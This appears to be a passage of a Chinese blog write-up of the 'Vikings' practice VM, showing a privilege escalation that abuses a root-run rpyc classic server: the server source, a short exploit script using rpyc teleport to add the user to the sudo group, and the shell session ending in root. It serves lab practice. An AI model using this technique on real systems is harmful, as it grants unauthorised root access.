PATH="$HOME/bin:$PATH"
fi # set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
PATH="$HOME/.local/bin:$PATH"
fi
$
  • 在 .profile 是 sudo python3 /usr/local/bin/rpyc_classic.py

查看该脚本

#!/usr/bin/python3
"""
classic rpyc server (threaded, forking or std) running a SlaveService
usage:
rpyc_classic.py # default settings
rpyc_classic.py -m forking -p 12345 # custom settings # ssl-authenticated server (keyfile and certfile are required)
rpyc_classic.py --ssl-keyfile keyfile.pem --ssl-certfile certfile.pem --ssl-cafile cafile.pem
"""
import sys
import os
import rpyc
from plumbum import cli
from rpyc.utils.server import ThreadedServer, ForkingServer, OneShotServer
from rpyc.utils.classic import DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT
from rpyc.utils.registry import REGISTRY_PORT
from rpyc.utils.registry import UDPRegistryClient, TCPRegistryClient
from rpyc.utils.authenticators import SSLAuthenticator
from rpyc.lib import setup_logger
from rpyc.core import SlaveService class ClassicServer(cli.Application):
mode = cli.SwitchAttr(["-m", "--mode"], cli.Set("threaded", "forking", "stdio", "oneshot"),
default="threaded", help="The serving mode (threaded, forking, or 'stdio' for "
"inetd, etc.)") port = cli.SwitchAttr(["-p", "--port"], cli.Range(0, 65535), default=None,
help="The TCP listener port (default = %s, default for SSL = %s)" %
(DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT), group="Socket Options")
host = cli.SwitchAttr(["--host"], str, default="", help="The host to bind to. "
"The default is localhost", group="Socket Options")
ipv6 = cli.Flag(["--ipv6"], help="Enable IPv6", group="Socket Options") logfile = cli.SwitchAttr("--logfile", str, default=None, help="Specify the log file to use; "
"the default is stderr", group="Logging")
quiet = cli.Flag(["-q", "--quiet"], help="Quiet mode (only errors will be logged)",
group="Logging") ssl_keyfile = cli.SwitchAttr("--ssl-keyfile", cli.ExistingFile,
help="The keyfile to use for SSL. Required for SSL", group="SSL",
requires=["--ssl-certfile"])
ssl_certfile = cli.SwitchAttr("--ssl-certfile", cli.ExistingFile,
help="The certificate file to use for SSL. Required for SSL", group="SSL",
requires=["--ssl-keyfile"])
ssl_cafile = cli.SwitchAttr("--ssl-cafile", cli.ExistingFile,
help="The certificate authority chain file to use for SSL. "
"Optional; enables client-side authentication",
group="SSL", requires=["--ssl-keyfile"]) auto_register = cli.Flag("--register", help="Asks the server to attempt registering with "
"a registry server. By default, the server will not attempt to register",
group="Registry")
registry_type = cli.SwitchAttr("--registry-type", cli.Set("UDP", "TCP"),
default="UDP", help="Specify a UDP or TCP registry", group="Registry")
registry_port = cli.SwitchAttr("--registry-port", cli.Range(0, 65535), default=REGISTRY_PORT,
help="The registry's UDP/TCP port", group="Registry")
registry_host = cli.SwitchAttr("--registry-host", str, default=None,
help="The registry host machine. For UDP, the default is 255.255.255.255; "
"for TCP, a value is required", group="Registry") def main(self):
if not self.host:
self.host = "::1" if self.ipv6 else "127.0.0.1" if self.registry_type == "UDP":
if self.registry_host is None:
self.registry_host = "255.255.255.255"
self.registrar = UDPRegistryClient(ip=self.registry_host, port=self.registry_port)
else:
if self.registry_host is None:
raise ValueError("With TCP registry, you must specify --registry-host")
self.registrar = TCPRegistryClient(ip=self.registry_host, port=self.registry_port) if self.ssl_keyfile:
self.authenticator = SSLAuthenticator(self.ssl_keyfile, self.ssl_certfile,
self.ssl_cafile)
default_port = DEFAULT_SERVER_SSL_PORT
else:
self.authenticator = None
default_port = DEFAULT_SERVER_PORT
if self.port is None:
self.port = default_port setup_logger(self.quiet, self.logfile) if self.mode == "threaded":
self._serve_mode(ThreadedServer)
elif self.mode == "forking":
self._serve_mode(ForkingServer)
elif self.mode == "oneshot":
self._serve_oneshot()
elif self.mode == "stdio":
self._serve_stdio() def _serve_mode(self, factory):
t = factory(SlaveService, hostname=self.host, port=self.port,
reuse_addr=True, ipv6=self.ipv6, authenticator=self.authenticator,
registrar=self.registrar, auto_register=self.auto_register)
t.start() def _serve_oneshot(self):
t = OneShotServer(SlaveService, hostname=self.host, port=self.port,
reuse_addr=True, ipv6=self.ipv6, authenticator=self.authenticator,
registrar=self.registrar, auto_register=self.auto_register)
t._listen()
sys.stdout.write("rpyc-oneshot\n")
sys.stdout.write("%s\t%s\n" % (t.host, t.port))
sys.stdout.flush()
t.start() def _serve_stdio(self):
origstdin = sys.stdin
origstdout = sys.stdout
sys.stdin = open(os.devnull, "r")
sys.stdout = open(os.devnull, "w")
sys.stderr = open(os.devnull, "w")
conn = rpyc.classic.connect_pipes(origstdin, origstdout)
try:
try:
conn.serve_all()
except KeyboardInterrupt:
print("User interrupt!")
finally:
conn.close() if __name__ == "__main__":
ClassicServer.run()

同时进行权限查看

ragnar@vikings:~$ ls /usr/local/bin/rpyc_classic.py -lh
-rwxr-xr-x 1 root root 6.1K Sep 3 2021 /usr/local/bin/rpyc_classic.py
  • 切换 shell 使用 bash -i

下面代码是在目标上执行,作用是进行 rpyc server 的请求,上面的 Python 登录是关于 rpyc server 的内容,不了解可以去百度

import rpyc
def shell():
import os
os.system('sudo usermod -a -G sudo ragnar') conn = rpyc.classic.connect('localhost')
fn = conn.teleport(shell)
fn()

先确认 ss -pantu | grep 18812 端口是否开放,再执行 exp.py 然后再重新登录

ragnar@vikings:~$ python3 exp.py
ragnar@vikings:~$ sudo su root
[sudo] password for ragnar:
Sorry, try again.
[sudo] password for ragnar:
sudo: 1 incorrect password attempt
ragnar@vikings:~$ exit
exit
$ exit
Connection to 192.168.56.120 closed. ┌──(kali㉿kali)-[~]
└─$ ssh ragnar@192.168.56.120 1 ⨯
ragnar@192.168.56.120's password:
Permission denied, please try again.
ragnar@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64) * Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage System information as of Fri Dec 2 03:20:13 UTC 2022 System load: 0.0 Processes: 95
Usage of /: 52.3% of 8.79GB Users logged in: 0
Memory usage: 18% IP address for enp0s3: 192.168.56.120
Swap usage: 0% 0 updates can be applied immediately. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Fri Dec 2 02:56:08 2022 from 192.168.56.116
[sudo] password for ragnar:
Traceback (most recent call last):
File "/usr/local/bin/rpyc_classic.py", line 130, in <module>
ClassicServer.run()
File "/usr/local/lib/python3.6/dist-packages/plumbum/cli/application.py", line 609, in run
retcode = inst.main(*tailargs)
File "/usr/local/bin/rpyc_classic.py", line 89, in main
self._serve_mode(ThreadedServer)
File "/usr/local/bin/rpyc_classic.py", line 100, in _serve_mode
registrar=self.registrar, auto_register=self.auto_register)
File "/usr/local/lib/python3.6/dist-packages/rpyc/utils/server.py", line 90, in __init__
self.listener.bind(address)
OSError: [Errno 98] Address already in use
$ bash -i
ragnar@vikings:~$ sudo -s
# id
uid=0(root) gid=0(root) groups=0(root)

自此以获得 root 权限

靶机练习: Vikings的更多相关文章

  1. CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

    本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...

  2. Ms17-010进行WEB提权之实践下某培训靶机服务器

    前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...

  3. metasploit利用漏洞渗透攻击靶机

    1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...

  4. 维京传奇第四季/全集Vikings迅雷下载

    英文全名Vikings,第4季(2015). 本季看点:<维京传奇>当第四季开始时,Ragnar已经病入膏肓,随时可能丧命.毫无疑问,权力斗争异常激烈,谁都想在Ragnar死后获得最大利益 ...

  5. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  6. Treasures and Vikings(两次搜索)

    Treasures and Vikings https://www.luogu.org/problemnew/show/P4668 题意翻译 你有一张藏宝图,藏宝图可视为 N×MN×M 的网格.每个格 ...

  7. Fowsniff: 1靶机入侵

    一.信息收集 1.存活主机扫描 arp-scan  -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...

  8. digitalworld.local: MERCY靶机入侵

    0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...

  9. Moonraker:1靶机入侵

      0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...

  10. FourAndSix: 2.01靶机入侵

      0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: htt ...

随机推荐

  1. 微信小程序-云函数、云存储

    云函数是运行在服务器端的 创建一个目录cloud project.config.json配置云函数目录 cloud目录有个云朵.代表云函数 初始化成功了 新建一个云函数 cloud目录右击 新建一个N ...

  2. Python-Django模板

    前面将hello world输出给浏览器,将数据与 视图 混合在一起,不符合 MVC思想. 模板就是一个文本,用来分离文档的表现形式和内容. 在templates目录下创建一个html模板 然后需要向 ...

  3. Unity接入微信支付SDK 2022年版安卓篇

    最近1年转了UE开发,博客更新的比较少,技术栈宽了不少,以后有空尽量多更新,也方便总结记忆 Unity接入微信支付整个过程坑比较多,网上之前的教程要么比较老,要么比较零碎,只能东拼西凑摸索,跑通后还是 ...

  4. 利用Kafka的Assign模式实现超大群组(10万+)消息推送

    引言 IM即时通信场景下,最重要的一个能力就是推送:在线的直接通过长连接网关服务转发,离线的通过APNS或者极光等系统进行推送.   本文主要是针对在线用户推送场景来进行总结和探讨:如何利用Kafka ...

  5. Elasticsearch 快照生命周期管理 (SLM) 实战指南

    文章转载自:https://mp.weixin.qq.com/s/PSfgPJc4dKN2pOZd0Y02wA 1.Elasticsearch 保证高可用性的方式 Elasticsearch 保证集群 ...

  6. Docker 部署 RocketMQ 双主双从模式( 版本v4.7.0)

    文章转载自:http://www.mydlq.club/article/96/ 系统环境: 系统版本:CentOS 7.8 RocketMQ 版本:4.7.0 Docker 版本:19.03.13 一 ...

  7. 史上最全的selenium三大等待介绍

    一.强制等待 1.设置完等待后不管有没有找到元素,都会执行等待,等待结束后才会执行下一步 2.实例 driver = webdriver.Chrome() driver.get("https ...

  8. java基础-冒泡排序以及稀疏数组

    java基础 以下内容为本人的学习笔记,如需要转载,请声明原文链接   https://www.cnblogs.com/lyh1024/p/16720908.html Ø 冒泡排序原理: 比较数组中, ...

  9. HBase1.4.6安装搭建及shell命令使用

    HBase1.4.6安装搭建 目录 HBase1.4.6安装搭建 一.前期准备(Hadoop,zookeeper,jdk) 搭建Hbase 1.上传解压 2.配置环境变量 3.修改hbase-env. ...

  10. PHP全栈开发:在本机上创建虚拟主机与域名

    如何在windows+wamp环境上进行自己创建的网站的域名访问 step 1 在wamp的安装目录,如C:\wamp64\www\下创建自己的网站目录pe step 2 右键wamp图标,在wamp ...